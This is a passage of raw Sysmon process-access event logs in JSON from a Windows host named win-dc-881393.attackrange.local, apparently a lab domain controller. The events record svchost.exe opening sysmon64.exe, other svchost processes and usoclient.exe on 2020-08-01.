05:56:30.757","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6079,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.757\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.757","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6080,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.757\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.757","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6081,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.757\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.757","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6082,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.757\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.757","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6083,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.757\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.757","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6084,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.757\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.757","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6085,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.757\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.757","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6086,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.757\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nSourceProcessId: 1144\r\nSourceThreadId: 2084\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-040E-5F25-0000-0010B6230B00}\r\nTargetProcessId: 4488\r\nTargetImage: C:\\Windows\\system32\\usoclient.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\UBPM.dll+a711|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e12a|c:\\windows\\system32\\UBPM.dll+dd82|c:\\windows\\system32\\EventAggregation.dll+3e22|c:\\windows\\system32\\EventAggregation.dll+389a|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a0